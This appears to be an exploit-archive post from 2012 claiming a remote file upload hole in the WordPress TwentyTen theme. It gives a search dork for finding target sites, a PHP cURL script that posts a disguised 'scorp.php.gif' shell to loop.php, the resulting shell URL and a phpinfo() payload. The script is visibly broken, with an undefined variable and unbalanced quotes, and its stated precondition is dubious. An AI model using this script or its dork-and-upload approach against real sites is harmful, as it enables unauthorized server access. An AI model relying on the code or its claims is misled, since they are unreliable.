WordPress TwentyTen Shell Upload



EKU-ID: 2920 CVE: OSVDB-ID:
Author: Agd_Scorp Published: 2012-12-31 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##################################################
# Description : Wordpress Themes - TwentyTen Remote File Upload
# Author : Agd_Scorp
# Contact: vorscorp@hotmail.com
# Version : 1.5.x/1.4.x/1.3.x/1.2.x/1.1.x
# Link : http://wordpress.org/extend/themes/twentyten
# Date : Friday, December 28, 2012
# Dork : inurl:/wp-content/themes/twentyten
##################################################

Fact :
this exploit only works if the LOOP_ARRAY functions are enabled in the server, which is disabled by default, although, if the administrator has ever configed the website, the array functions might've been enabled on by default, and cURL must be enabled too.
 
 
Exploit :
 
<?php
 
$uploadfile="scorp.php.gif";
 
$ch =
curl_init("http://www.site.com/wordpress/wp-content/themes/twentyten/loop.php");
 
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('file[]'=>"@$attachfile"));
curl_setopt($ch, CURLOPT_POSTFIELDS, array('opt[]'=>"@$connector?rate=50&get_file=0?upload="@$attachfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
 
print "$postResult";
 
?>
 
Shell Access : http://www.site.com/wordpress/wp-content/themes/twentyten/scorp.php.gif
Filename : $postResult output
 
scorp.php.gif
<?php
phpinfo();
?>